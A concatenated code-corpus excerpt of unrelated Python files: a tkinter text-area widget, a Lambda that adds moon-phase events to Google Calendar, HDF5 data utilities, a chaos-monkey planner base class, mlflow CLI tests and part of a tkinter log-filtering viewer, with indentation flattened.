ax1 = fig.add_subplot(1, 1, 1)
ax1.set_title('Figure')
ax1.set_xlabel('psi')
ax1.set_ylabel(dictator)
ax1.plot(x, y)
# ax1.scatter(range(len(y2)), y2, color='g', marker='+')
plt.show()
# hills(target_file, dictator="freeenergy")
# colvar(target_file)
# free_energy(target_file, dictator="free_energy")
convergence(target_file, dictator="free_energy")
| 2.703125 | 3 |
layoutx/widgets/textarea.py | 8or5q/LayoutX | 61 | 12786311 | from .widget import Widget
import tkinter as tk
from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox
from tkinter.constants import RIGHT, LEFT, Y, BOTH
from tkinter.font import Font, BOLD, nametofont
from .scroll_frame import AutoScrollbar
from pygments.styles import get_style_by_name
from pygments.lexers import get_lexer_by_name
from ttkwidgets.autocomplete import AutocompleteEntryListbox
class ScrolledText(Text):
def __init__(self, master=None, **kw):
self.frame = Frame(master)
self.vbar = AutoScrollbar(self.frame, orient="vertical")
self.vbar.grid(row=0, column=1, sticky="ns")
self.frame.grid_columnconfigure(0, weight=1)
self.frame.grid_columnconfigure(1, weight=0)
self.frame.grid_rowconfigure(0, weight=1)
kw.update({'yscrollcommand': self.vbar.set})
Text.__init__(self, self.frame, **kw)
self.vbar['command'] = self.yview
Text.grid(self, row=0, column=0, sticky="news")
# Copy geometry methods of self.frame without overriding Text
# methods -- hack!
text_meths = vars(Text).keys()
methods = vars(Pack).keys() | vars(Grid).keys() | vars(Place).keys()
methods = methods.difference(text_meths)
for m in methods:
if m[0] != '_' and m != 'config' and m != 'configure' and m not in ["grid", "pack"]:
setattr(self, m, getattr(self.frame, m))
def __str__(self):
return str(self.frame)
def pack(self, *args, **kwargs):
self.frame.pack(*args, **kwargs)
#self.frame.pack_propagate(False)
def grid(self, *args, **kwargs):
self.frame.grid(*args, **kwargs)
class TextArea(Widget):
def __init__(self, master, **kwargs):
super().__init__(tk=ScrolledText(master=master, wrap=tk.WORD), **kwargs)
self._spaces = ' '
self._lexer = None
self._lexer_style = None
self._autocomplete_list = None
self._tk.bind('<KeyRelease>', self._set_data)
self._tk.bind('<Tab>', self._tab_to_spaces)
self._tk.bind('<Return>', self._autoindent)
self._tk.bind("<Control-KeyRelease-plus>", self._increase_size)
self._tk.bind("<Control-KeyRelease-minus>", self._decrease_size)
self._tk.bind("<Control-KeyRelease-space>", self._autocomplete)
self._value_setter = self.connect_to_prop("value", self.on_changed_value)
self.connect_to_prop("spaces", self._on_changed_spaces)
self.connect_to_prop("language", self._on_changed_language)
self.connect_to_prop("highlightstyle", self._on_changed_highlightstyle)
self.connect_to_prop("autocomplete", self._on_changed_autocomplete)
def _on_changed_autocomplete(self, value):
self._autocomplete_list = value
def _autocomplete(self, event):
if not self._autocomplete_list or len(self._autocomplete_list) == 0:
return
index = self._tk.index(INSERT).split(".")
self._text_index = '.'.join(index)
tw = Toplevel(self._tk)
tw.wm_overrideredirect(True)
font = self._get_font()
font_size = int(font.cget("size"))
tw.geometry(f"+{ self._tk.winfo_rootx() + int(index[1]) * int(font_size / 2) }+{ self._tk.winfo_rooty() + int(index[0]) * font_size }")
self._listbox = AutocompleteEntryListbox(tw, font=font, allow_other_values=False, completevalues=[v["name"] for v in self._autocomplete_list])
self._listbox.pack()
tw.lift()
tw.focus_force()
tw.grab_set()
tw.grab_release()
self._listbox.focus_force()
self._listbox.listbox.bind("<Double-Button-1>", self._autocomplete_selected)
self._listbox.entry.bind("<Return>", self._autocomplete_selected)
self._listbox.bind("<Leave>", self._autocomplete_destroy)
self._listbox.bind("<Escape>", self._autocomplete_destroy)
self._autocomplete_window = tw
def _autocomplete_selected(self, event):
value = next(v["value"] for v in self._autocomplete_list if v["name"] == self._listbox.get())
self._tk.insert(self._text_index, value)
self._listbox.event_generate("<Leave>")
def _autocomplete_destroy(self, event):
if self._autocomplete_window:
self._autocomplete_window.destroy()
self._autocomplete_window = None
self._tk.focus_force()
self._tk.mark_set("insert", self._text_index)
def _get_font(self):
return nametofont(self.get_style_attr('font'))
def _increase_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") + 1))
#self._tk.configure(font=font)
def _decrease_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") - 1))
#self._tk.configure(font=font)
def _highlight(self):
if not self._lexer:
return
code = self._get_text()
self._tk.mark_set("range_start", "1" + ".0")
for token, value in self._lexer.get_tokens(code):
if len(value) == 0:
continue
self._tk.mark_set("range_end", "range_start + %dc" % len(value))
self._tk.tag_add(str(token), "range_start", "range_end")
self._tk.mark_set("range_start", "range_end")
def _on_changed_highlightstyle(self, value):
self._lexer_style = get_style_by_name(value)
self._tk.configure(
background=self._lexer_style.background_color,
insertbackground=self._lexer_style.highlight_color,
foreground=self._lexer_style.highlight_color)
for tag in self._tk.tag_names():
self._tk.tag_delete(tag)
for token, value in self._lexer_style.styles.items():
token_value = value.split(' ')
foreground = list(filter(lambda x: x.startswith("#"), token_value))
if len(foreground) == 0:
continue
if str(token) == "Token.Text":
self._tk.configure(
insertbackground=foreground[0],
foreground=foreground[0])
self._tk.tag_configure(str(token), foreground=foreground[0])
self._highlight()
def _on_changed_language(self, value):
if value:
self._lexer = get_lexer_by_name(value)
def _on_changed_spaces(self, value):
self._spaces = ''.join([" "] * int(value))
def _autoindent(self, event):
indentation = ""
lineindex = self._tk.index("insert").split(".")[0]
linetext = self._tk.get(lineindex+".0", lineindex+".end")
for character in linetext:
if character in [" ","\t"]:
indentation += character
else:
break
self._tk.insert(self._tk.index("insert"), "\n"+indentation)
return "break"
def _tab_to_spaces(self, event):
self._tk.insert(self._tk.index("insert"), self._spaces)
return "break"
def _get_text(self):
return self._tk.get("1.0", tk.END)[:-1]
def _set_data(self, event):
if self._value_setter:
self._value_setter(self._get_text())
def on_changed_value(self, value):
if value:
index = self._tk.index(tk.INSERT)
self._tk.delete("1.0", tk.END)
self._tk.insert(tk.END, value)
self._tk.mark_set("insert", index)
self._tk.see(index)
self._highlight()
def on_disposed(self):
self._tk.unbind('<KeyRelease>') | 2.484375 | 2 |
lambdas/create_event/main.py | Kruril/LunaV2 | 0 | 12786312 | import json
from datetime import datetime, timedelta
import requests
import os.path
import boto3
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
# If modifying these scopes, delete the file credentials.json.
SCOPES = ['https://www.googleapis.com/auth/calendar']
CREDENTIALS_FILE = 'credentials.json'
s3 = boto3.client("s3")
s3_bucket = os.environ["BUCKET"]
def create_event(event, context):
month = datetime.now().month
year = datetime.now().year
service = get_calendar_service()
phases = requests.get(f"https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}").json()["phase"]
for day_number in phases:
phase = phases[day_number]["npWidget"]
day = datetime(year, month, int(day_number))
start = (day + timedelta(hours=18)).isoformat()
end = (day + timedelta(hours=18, minutes=30)).isoformat()
service.events().insert(calendarId='primary',
body={
"summary": phase,
"start": {"dateTime": start, "timeZone": 'Europe/Brussels'},
"end": {"dateTime": end, "timeZone": 'Europe/Brussels'},
}
).execute()
def get_calendar_service():
obj = s3.get_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE)
# The S3 streaming body can only be read once, so parse it into a dict up front
creds_info = json.load(obj['Body'])
creds = Credentials.from_authorized_user_info(creds_info, SCOPES)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_config(creds_info, SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
s3.put_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE, Body=creds.to_json())
service = build('calendar', 'v3', credentials=creds)
return service
if __name__ == '__main__':
create_event("salut", "coucou")
# Create credentials file
# service = get_calendar_service()
| 2.71875 | 3 |
utils/data_utils.py | kdmarshall/Two_Sigma_Financial_Modeling_Challenge | 3 | 12786313 | __doc__ = """
Various data utilities.
"""
####################################################################
# Packages
####################################################################
import os
import h5py
import numpy as np
import pandas as pd
####################################################################
# Globals/Constants
####################################################################
PROJECT_DIR = os.path.dirname(
os.path.dirname(
os.path.realpath(__file__)))
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
TRAIN_DATA_FILE = os.path.join(DATA_DIR, 'train.h5')
####################################################################
# Functions
####################################################################
def get_data(path=None):
if path:
data_set = DataSet(path)
else:
data_set = DataSet(TRAIN_DATA_FILE)
return data_set
####################################################################
# Classes
####################################################################
class DataSet(object):
"""class for dataset processing"""
def __init__(self, path=TRAIN_DATA_FILE):
self.path = path
self.data_dict = self._get_data_dict()
self.df = self._get_df()
def _get_data_dict(self):
with h5py.File(self.path,'r') as hf:
train_hf = hf.get('train')
data_dict = { hf_key: np.array(train_hf.get(hf_key))
for hf_key in train_hf.keys()}
return data_dict
def _get_df(self):
with pd.HDFStore(self.path, "r") as train:
df = train.get("train")
return df
def __repr__(self):
sets = [ "{}: {}".format(key,data_set.shape)
for key, data_set in
self.data_dict.items()]
return "; ".join(sets)
def keys(self):
return self.data_dict.keys()
def get(self, key):
return self.data_dict.get(key, None)
def to_df(self):
return self.df
def get_batch(self, slice_index, batch_size, columns=None, random=False):
if random:
samples = self.df.sample(n=batch_size)
else:
num_samples = self.df.shape[0]
if (slice_index+1)*batch_size >= num_samples:
print("Slice is out of range. Taking last batch_size slice")
sample_range = (num_samples - batch_size, num_samples)
else:
sample_range = (slice_index*batch_size, (slice_index+1)*batch_size)
samples = self.df[sample_range[0] : sample_range[1]]
samples_matrix = np.array(samples.as_matrix(columns=columns)) if columns else np.array(samples.as_matrix())
return samples_matrix
def get_numpy_data(self):
df = self.df
means = []
stds = []
# Assuming column order remains consistent throughout the class
for col in df.columns:
if col not in ['y', 'timestamp', 'index', 'id']:
data = df[col].dropna().as_matrix()
means.append(np.mean(data))
stds.append(np.std(data))
col_means = np.array(means)
col_stds = np.array(stds)
# Ensure values are sorted by time
df = df.sort_values(by=['id', 'timestamp'], ascending=True)
max_seq_len_raw = 1820
# Simply mean-fill missing values for now
df = df.fillna(df.mean())
ids = np.unique(df['id'].as_matrix())
examples = []
targets = []
weights = []
for id in ids:
slice = df[df.id == id]
num_timesteps = slice.shape[0]
#y = slice['y'].as_matrix()
# Pad df to max seq len
padded = slice.reset_index().reindex(range(max_seq_len_raw),
fill_value=0)
target = padded['y'].as_matrix()
padded.drop('y', axis=1, inplace=True)
padded.drop('timestamp', axis=1, inplace=True)
padded.drop('index', axis=1, inplace=True)
padded.drop('id', axis=1, inplace=True)
example = padded.as_matrix()
examples.append(example)
targets.append(target)
weight = [1]*num_timesteps + [0]*(max_seq_len_raw - num_timesteps)
weights.append(weight)
examples = np.array(examples)
targets = np.array(targets)
weights = np.array(weights)
# Normalize the data
examples = (examples - col_means)/col_stds
# TODO: Supply these outside the function later: col_means, col_stds
return examples, targets, weights
def split_valid(self, examples, targets, weights, valid_split_ratio=0.5):
"""
Args:
valid_split_ratio: float range 0-1.; percentage of data reserved
for validation. Note that two validation sets are reserved: unique
ids are reserved entirely for validation, and, latter timesteps for
sequences used in training are also used in validation.
"""
num_ids = examples.shape[0]
valid_num = int(round(num_ids*valid_split_ratio))
examples_train_pre = examples[:-valid_num]
targets_train_pre = targets[:-valid_num]
weights_train_pre = weights[:-valid_num]
examples_valid = examples[-valid_num:]
targets_valid = targets[-valid_num:]
weights_valid = weights[-valid_num:]
examples_train = []
targets_train = []
weights_train = []
examples_train_valid = []
targets_train_valid = []
weights_train_valid = []
valid_len = 300 # Hardcoded for now
for arr1, arr2, arr3 in zip(examples_train_pre, targets_train_pre,
weights_train_pre):
examples_train.append(arr1[:-valid_len])
targets_train.append(arr2[:-valid_len])
weights_train.append(arr3[:-valid_len])
examples_train_valid.append(arr1[-valid_len:])
targets_train_valid.append(arr2[-valid_len:])
weights_train_valid.append(arr3[-valid_len:])
trainset = (np.array(examples_train), np.array(targets_train),
np.array(weights_train))
train_validset = (np.array(examples_train_valid),
np.array(targets_train_valid),
np.array(weights_train_valid))
validset = (examples_valid, targets_valid, weights_valid)
return trainset, train_validset, validset
def get_numpy_batch(self, dataset, batch_size, seq_len):
examples = []
targets = []
weights = []
#for _ in range(batch_size):
while len(targets) < batch_size:
# Sample a random id
idx = np.random.choice(range(dataset[0].shape[0]))
# Take random slice
max_seq_len = dataset[0][idx].shape[0]
assert max_seq_len >= seq_len
slice = np.random.choice(range(max_seq_len - seq_len))
# Let's just go with full length for now
w = dataset[2][idx][slice:slice+seq_len]
if np.sum(w) != len(w):
continue
examples.append(dataset[0][idx][slice:slice+seq_len])
targets.append(dataset[1][idx][slice:slice+seq_len])
weights.append(w)
return np.array(examples), np.array(targets), np.array(weights)
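# Hedged usage sketch (illustrative; TRAIN_DATA_FILE must point at the real train.h5 for
# this to run end to end):
def _example_batch(batch_size=32, seq_len=100):
    dataset = get_data()
    examples, targets, weights = dataset.get_numpy_data()
    trainset, _, _ = dataset.split_valid(examples, targets, weights)
    return dataset.get_numpy_batch(trainset, batch_size, seq_len)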
| 2 | 2 |
chaosmonkey/planners/planner.py | BBVA/chaos-monkey-engine | 52 | 12786314 | <filename>chaosmonkey/planners/planner.py
"""
Base class for planners
Every planner must extend Planner class
"""
from chaosmonkey.engine.cme_manager import manager
class Planner:
"""
Planner interface
Planners are responsible for scheduling jobs that executes attacks
:param name: plan name
"""
ref = None # must override
schema = None # must override
example = None # must override
def __init__(self, name):
self.name = name
def plan(self, planner_config, attack_config):
"""
Plan the jobs.
This method should use the config to schedule jobs based on the
configuration for the planner
:param planner_config: configuration related to the scheduler
:param attack_config: configuration related to the attack
"""
raise NotImplementedError("Plans should implement this!")
@staticmethod
def add_plan(name):
return manager.add_plan(name)
@staticmethod
def _add_executor(date, name, attack_config, plan_id):
"""
Add a job to the global scheduler
:param date: date to execute the job
:param name: job name
:param attack_config: configuration related to the attack
"""
date_timezone = manager.scheduler.timezone.localize(date)
manager.add_executor(date_timezone, name, attack_config, plan_id)
@staticmethod
def to_dict():
raise NotImplementedError("Planners should implement this!")
@staticmethod
def _to_dict(ref, schema, example):
return {
"ref": ref,
"schema": schema,
"example": example,
}
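# Hedged illustration (not part of the original module): a minimal concrete planner that
# schedules a single execution; the 'date' config key below is invented for the example.
class ExampleSimplePlanner(Planner):
    ref = 'example_simple:ExampleSimplePlanner'
    schema = {}
    example = {'ref': 'example_simple:ExampleSimplePlanner', 'args': {'date': '2030-01-01 00:00:00'}}
    def plan(self, planner_config, attack_config):
        from datetime import datetime
        plan_id = self.add_plan(self.name)
        run_at = datetime.strptime(planner_config['date'], '%Y-%m-%d %H:%M:%S')
        self._add_executor(run_at, self.name, attack_config, plan_id)
    @staticmethod
    def to_dict():
        return Planner._to_dict(ExampleSimplePlanner.ref, ExampleSimplePlanner.schema,
                                ExampleSimplePlanner.example)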
| 3.09375 | 3 |
tests/test_runs.py | rbrown-kayak/mlflow | 0 | 12786315 | from click.testing import CliRunner
from unittest import mock
import numpy as np
import os
import pandas as pd
import shutil
import tempfile
import textwrap
from mlflow import experiments
from mlflow.runs import list_run
import mlflow
def test_list_run():
with mlflow.start_run(run_name="apple"):
pass
result = CliRunner().invoke(list_run, ["--experiment-id", "0"])
assert "apple" in result.output
def test_list_run_experiment_id_required():
result = CliRunner().invoke(list_run, [])
assert "Missing option '--experiment-id'" in result.output
def test_csv_generation():
with mock.patch("mlflow.experiments.fluent.search_runs") as mock_search_runs:
mock_search_runs.return_value = pd.DataFrame(
{
"run_id": np.array(["all_set", "with_none", "with_nan"]),
"experiment_id": np.array([1, 1, 1]),
"param_optimizer": np.array(["Adam", None, "Adam"]),
"avg_loss": np.array([42.0, None, np.nan], dtype=np.float32),
},
columns=["run_id", "experiment_id", "param_optimizer", "avg_loss"],
)
expected_csv = textwrap.dedent(
"""\
run_id,experiment_id,param_optimizer,avg_loss
all_set,1,Adam,42.0
with_none,1,,
with_nan,1,Adam,
"""
)
tempdir = tempfile.mkdtemp()
try:
result_filename = os.path.join(tempdir, "result.csv")
CliRunner().invoke(
experiments.generate_csv_with_runs,
["--experiment-id", "1", "--filename", result_filename],
)
with open(result_filename, "r") as fd:
assert expected_csv == fd.read()
finally:
shutil.rmtree(tempdir)
| 2.4375 | 2 |
logfilter/logfilter.py | iamFIREcracker/logfilter | 0 | 12786316 | <reponame>iamFIREcracker/logfilter
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import os
import re
import time
import subprocess
import threading
from argparse import ArgumentParser
from collections import deque
from itertools import cycle
from itertools import takewhile
from logfilter import __version__
from ._compact import filedialog
from ._compact import filter
from ._compact import tkinter
from ._compact import queue
from ._compact import range
from .common import debug
from .common import Tag
from .common import BooleanVar
from .common import StringVar
from .ui import FilterBar
"""Number of lines to collect before telling the gui to refresh."""
_BATCH_LIMIT = 200
"""Default event listener."""
_NULL_LISTENER = lambda *a, **kw: None
"""Gui polling job interval"""
_POLL_INTERVAL = 66
"""Stop message used to stop threads."""
_STOP_MESSAGE = None
FOREGROUND = '#F8F8F2'
BACKGROUND = '#1B1D1E'
CURRENTLINEBACKGROUND = '#232728'
SELECTFOREGROUND = FOREGROUND
SELECTBACKGROUND = '#403D3D'
"""Tag color palette."""
_TAG_PALETTE = (
('red', '#E52222'),
('green', '#A6E32D'),
('yellow', '#FD951E'),
('blue', '#C48DFF'),
('magenta', '#FA2573'),
('cyan', '#67D9F0')
)
"""Application title template"""
_TITLE = 'logfilter: {filename}'
"""Default initial directory used by the file chooser widget"""
_INITIALDIR = os.path.expanduser('~')
"""Number of lines to display on screen."""
LINES_LIMIT = 8000
"""Special scroll limit value to use a kind of infinite scroll buffer."""
LINES_UNLIMITED = -1
"""Default sleep interval"""
SLEEP_INTERVAL = 1.0
"""Passthru filter."""
PASSTHRU_FILTER = '^'
"""End of file sentinel"""
EOF = object()
"""List of env variables to check while editing a file"""
EDITORS = 'LFEDITOR VISUAL EDITOR'.split(' ')
"""Sentinel to check wether selected line has been initialized or not"""
UNSELECTED = object()
class Gui(tkinter.Tk):
def __init__(self, parent, **kwargs):
tkinter.Tk.__init__(self, parent)
self._schedule_queue = queue.Queue()
self.on_quit_listener = (_NULL_LISTENER, (), {})
self.on_new_filter_listener = (_NULL_LISTENER, (), {})
self._initialize(**kwargs)
self._update()
def _initialize(self, font, filename, filters, scroll_limit):
"""
Initialize the layout of the GUI
"""
self.grid()
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(2, weight=1)
self.protocol('WM_DELETE_WINDOW', self.on_close)
# Container 0
self.file_chooser = FileChooser(self, filename=filename)
self.file_chooser.grid(row=0, column=0, sticky='EW')
self.file_chooser.register_listener('press_enter', self.on_press_enter)
# Container1
container1 = tkinter.Frame(self)
container1.grid(row=1, column=0, sticky='EW')
container15 = tkinter.Frame(container1)
container15.grid(row=0, column=0, sticky='EW')
self.filter_bar = FilterBar(container15, filter_values=filters)
self.filter_bar.grid(row=0, column=0, sticky='EW')
self.filter_bar.bind('<<FiltersReady>>', self.on_press_enter_event)
button = tkinter.Button(
container1, text="Filter", command=self.on_press_enter)
button.grid(row=0, column=len(filters) + 1, sticky='EW')
# Container2
self.text = Text(
self, foreground=FOREGROUND, background=BACKGROUND,
selectforeground=SELECTFOREGROUND,
selectbackground=SELECTBACKGROUND,
inactiveselectbackground=SELECTBACKGROUND,
font=font, wrap=tkinter.NONE)
self.text.grid(row=2, column=0, sticky='NSEW')
self.text.bind('<<PassthruSwitch>>', self.on_press_enter_event) # XXX why the hell can't use register_listener here???
self.text.configure_scroll_limit(scroll_limit)
self.text.set_filename(filename)
def _update(self):
"""
Poll the schedule queue for new actions.
"""
for i in range(10):
try:
(func, args, kwargs) = self._schedule_queue.get(False)
#print '- schedule_queue', self._schedule_queue.qsize()
except queue.Empty:
break
self.after_idle(func, *args, **kwargs)
self.after(_POLL_INTERVAL, self._update)
@debug
def on_close(self):
(func, args, kwargs) = self.on_quit_listener
func(*args, **kwargs)
self.quit()
@debug
def on_quit(self, event):
self.on_close()
@debug
def on_press_enter(self):
filename = self.file_chooser.get_filename()
passthru = self.text.get_passthru()
self.title(_TITLE.format(filename=filename))
filter_strings = self.filter_bar.get_filter_values()
# When the passthru switch is enabled notify workers the sole
# catch-all filter in order to simplify processing
queue_filter_strings = [PASSTHRU_FILTER] if passthru \
else filter_strings
self.text.set_filename(filename)
self.text.configure_tags(
Tag(n, f, {'foreground': c})
for ((n, c), f) in zip(cycle(_TAG_PALETTE), filter_strings))
(func, args, kwargs) = self.on_new_filter_listener
args = [filename, queue_filter_strings] + list(args)
func(*args, **kwargs)
@debug
def on_press_enter_event(self, event):
self.on_press_enter()
def raise_(self):
"""
Raise the window on the top of windows stack.
The method is supposed to be invoked by the gui thread, hence it should
be used in pair with `schedule`.
"""
#self.attributes('-topmost', True)
#self.attributes('-topmost', False)
self.lift()
self.focus_force()
def register_listener(self, event, func, *args, **kwargs):
"""
Register a listener for the specified named event.
@param func function to schedule
@param args positional arguments for the function
@param kwargs named arguments for the function
"""
if event not in ['quit', 'new_filter']:
raise ValueError("Invalid event name: " + event)
if event == 'quit':
self.on_quit_listener = (func, args, kwargs)
elif event == 'new_filter':
self.on_new_filter_listener = (func, args, kwargs)
def schedule(self, func, *args, **kwargs):
"""
Ask the event loop to schedule given function with arguments
@param func function to schedule
@param args positional arguments for the function
@param kwargs named arguments for the function
"""
self._schedule_queue.put((func, args, kwargs))
def clear_text(self):
"""
Delete all the text contained in the text area.
The method schedules the action on the gui thread, hence it is to be
considered thread-safe.
"""
def wrapped():
self.text.clear()
self.schedule(wrapped)
def append_text(self, lines):
"""
Append input lines into the text area and scroll to the bottom.
Additionally, raise the window on top of windows stack.
The method schedules the action on the gui thread, hence it is to be
considered thread-safe.
@param lines iterable containing the lines to be added.
"""
def wrapped():
self.text.append(lines)
if self.text.raise_on_output:
self.raise_()
self.schedule(wrapped)
class FileChooser(tkinter.Frame):
"""
Widget used to select a file from the file-system.
"""
def __init__(self, parent, **kwargs):
tkinter.Frame.__init__(self, parent)
self.on_press_enter_listener = (_NULL_LISTENER, (), {})
self._initialize(**kwargs)
def _initialize(self, filename):
"""
Initialize the file chooser widget.
"""
self.grid_columnconfigure(0, weight=1)
self.filename = StringVar(filename)
entry = tkinter.Entry(self, textvariable=self.filename)
entry.bind("<Return>", self.on_press_enter_event)
entry.grid(row=0, column=0, sticky='EW')
button = tkinter.Button(
self, text="Select file", command=self.on_button_click)
button.grid(row=0, column=1)
@debug
def on_press_enter(self):
(func, args, kwargs) = self.on_press_enter_listener
func(*args, **kwargs)
@debug
def on_press_enter_event(self, event):
self.on_press_enter()
@debug
def on_button_click(self):
"""
Open a filechooser dialog and set the internal filename.
"""
prev = self.filename.get()
initialdir = os.path.dirname(prev) if prev else _INITIALDIR
filename = filedialog.askopenfilename(
parent=self, initialdir=initialdir, title='Choose a file')
if filename:
self.filename.set(filename)
def get_filename(self):
"""
Return the content of the filename entry.
@return the filename entry content.
"""
return self.filename.get()
def register_listener(self, event, func, *args, **kwargs):
"""
Register a listener for the specified named event.
@param func function to schedule
@param args positional arguments for the function
@param kwargs named arguments for the function
"""
if event not in ['press_enter']:
raise ValueError("Invalid event name: " + event)
if event == 'press_enter':
self.on_press_enter_listener = (func, args, kwargs)
class Text(tkinter.Frame):
"""
Extension of the `Tk.Text` widget which add support to colored strings.
The main goal of the widget is to extend the `#insert` method to add support
for string coloring, depending on an input tags.
"""
def __init__(self, parent, **kwargs):
tkinter.Frame.__init__(self, parent)
self._scroll_limit = LINES_LIMIT
self._scroll_on_output = BooleanVar(True)
self._raise_on_output = BooleanVar(True)
self._greedy_coloring = BooleanVar(False)
def _on_passthru_change(*args, **kwargs):
self.event_generate('<<PassthruSwitch>>')
self._passthru = BooleanVar(False, _on_passthru_change)
self._lines = 0
self._line_numbers = deque()
self._filename = ''
self._current_line = UNSELECTED
self._tags = []
self._initialize(**kwargs)
def _popuplabel(self, text):
"""
Create a label to be displayed in the popup menu.
"""
return text.ljust(20)
def _initialize(self, **kwargs):
"""
Initialize the text widget.
"""
text = tkinter.Text(self, **kwargs)
vert_scroll = tkinter.Scrollbar(self)
horiz_scroll = tkinter.Scrollbar(self, orient=tkinter.HORIZONTAL)
popup = tkinter.Menu(self, tearoff=0)
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
popup.add_command(label=self._popuplabel('Edit'), command=self.edit)
popup.add_command(label=self._popuplabel('Clear'), command=self.clear)
popup.add_separator()
popup.add_checkbutton(
label=self._popuplabel('Greedy coloring'),
onvalue=True, offvalue=False, variable=self._greedy_coloring)
popup.add_checkbutton(
label=self._popuplabel('Passthru'),
onvalue=True, offvalue=False, variable=self._passthru)
popup.add_separator()
popup.add_checkbutton(
label=self._popuplabel('Auto scroll'),
onvalue=True, offvalue=False, variable=self._scroll_on_output)
popup.add_checkbutton(
label=self._popuplabel('Auto raise'),
onvalue=True, offvalue=False, variable=self._raise_on_output)
text.tag_config('currentline', background=CURRENTLINEBACKGROUND)
text.tag_config('selection', background=SELECTBACKGROUND)
text.grid(row=0, column=0, sticky='NSEW')
text.config(yscrollcommand=vert_scroll.set)
text.config(xscrollcommand=horiz_scroll.set)
text.config(state=tkinter.DISABLED)
text.bind("<Button-1>", self._highlight_current_line)
text.bind("<Button-3>", self._show_popup)
text.bind("<<Selection>>", self._on_selection_change)
vert_scroll.grid(row=0, column=1, sticky='NS')
vert_scroll.config(command=text.yview)
horiz_scroll.grid(row=1, column=0, sticky='EW')
horiz_scroll.config(command=text.xview)
self.text = text
self.popup = popup
def _clear_selection(self):
try:
self.text.tag_remove("sel", "sel.first", "sel.last")
except tkinter.TclError:
pass
def _clear_current_line(self):
if self._current_line is not UNSELECTED:
line_end = self.text.index("{0} + 1 lines".format(self._current_line))
self.text.tag_remove("currentline", self._current_line, line_end)
self._current_line = UNSELECTED
def _extract_row(self, rowcol):
"""
Given a tkinter position information (i.e. 10.2, where 10 is the row
number, and 2 is the column one), extract the information of the row
"""
return int(float(rowcol))
def _highlight_current_line(self, event):
# Clear old current line
self._clear_current_line()
# .. and highlight the new line
newline = self.text.index(
"@{0},{1} linestart".format(event.x, event.y))
if self._extract_row(newline) <= self._lines:
self._current_line = newline
line_end = self.text.index("{0} + 1 lines".format(self._current_line))
self.text.tag_add("currentline", self._current_line, line_end)
# Finally, hide the menu
self.popup.unpost()
def _on_selection_change(self, event):
try:
if self.text.get("sel.first", "sel.last"):
self._clear_current_line();
except tkinter.TclError:
pass
def _show_popup(self, event):
self._clear_selection()
self._highlight_current_line(event)
self.popup.post(event.x_root, event.y_root)
def configure_scroll_limit(self, scroll_limit):
"""
Cache the widget scroll limit.
@param limit new scroll limit.
"""
self._scroll_limit = scroll_limit
def set_filename(self, filename):
"""
Set the name of the file from which we will receive updates.
@param filename filename
"""
self._filename = filename
def configure_tags(self, tags):
"""
Configure text tags.
@param tags collection of `Tag` items
"""
self._tags = list(tags)
[self.text.tag_config(t.name, t.settings) for t in self._tags]
def clear(self):
"""
Clear the text widget.
"""
self.text.config(state=tkinter.NORMAL)
self.text.delete(1.0, tkinter.END)
self.text.config(state=tkinter.DISABLED)
self._lines = 0
self._line_numbers = deque()
def get_passthru(self):
"""
Return the value of the passthru switch
@return the value of the passthru switch.
"""
return self._passthru.get()
def _get_editor(self):
"""
Return the editor to use to open the current file.
The function will look for environment variables in the given order:
LFEDITOR, VISUAL and finally EDITOR
"""
for name in EDITORS:
if name in os.environ:
return os.environ[name]
def _get_file_line_number(self):
"""
Get the file row associated with the mouse event.
"""
index = self._extract_row(self._current_line) - 1
if index >= len(self._line_numbers):
if self._line_numbers:
return str(self._line_numbers[-1])
else:
return str(1)
else:
# Deques are not optimized for random access, but given that
# edit operations are not so frequent we can just tolerate this
# inefficiency
return str(self._line_numbers[index])
def edit(self):
"""
Open the current file inside your preferred editor.
"""
cmd = self._get_editor()
cmd = cmd.replace('FILE', self._filename)
cmd = cmd.replace('ROW', self._get_file_line_number())
subprocess.Popen(cmd, shell=True)
def append(self, lines):
"""
Append given lines to the text widget and try to color them.
@param lines lines to add
"""
def highlight_tag(tag):
"""
Helper function simply used to adapt function signatures.
"""
self._highlight_pattern(start, end, tag.pattern, tag.name)
self.text.config(state=tkinter.NORMAL)
for (i, line) in lines:
start = self.text.index('{0} - 1 lines'.format(tkinter.END))
end = self.text.index(tkinter.END)
self.text.insert(tkinter.END, line)
[highlight_tag(t) for t in list(self._tags)]
self._lines += 1
self._line_numbers.append(i)
if (self._scroll_limit != LINES_UNLIMITED
and self._lines > self._scroll_limit):
# delete from row 1, column 0, to row 2, column 0 (first line)
self.text.delete(1.0, 2.0)
self._lines -= 1
self._line_numbers.popleft()
if self._current_line is not UNSELECTED:
self._current_line = self.text.index(
"{0} - 1 lines".format(self._current_line))
self.text.config(state=tkinter.DISABLED)
# Scroll to the bottom
if self._scroll_on_output.get():
self.text.yview(tkinter.MOVETO, 1.0)
def _highlight_pattern(self, start, end, pattern, tag_name):
"""
Highlight the input pattern with the settings associated with the tag.
Given a tag and a pattern, the function will match only the first
occurrence of the pattern (unless greedy coloring is enabled).
@param start start search index
@param stop stop search index
@param pattern string pattern matching the tag
@param tag_name name of the tag to associate with matching strings
"""
while True:
count = tkinter.IntVar()
index = self.text.search(pattern, start, end, count=count, regexp=True)
if not index:
return
match_end = '{0}+{1}c'.format(index, count.get())
self.text.tag_add(tag_name, index, match_end)
start = match_end
if not self._greedy_coloring.get():
return
@property
def raise_on_output(self):
return self._raise_on_output.get()
@debug
def filter_thread_spawner_body(lines, interval, filter_queue,
lines_queue):
"""
Spawn a file filter thread as soon as a filter is read from the queue.
@param lines line used to skip stale lines
@param interval polling interval
@param filter_queue message queue containing the filter to apply
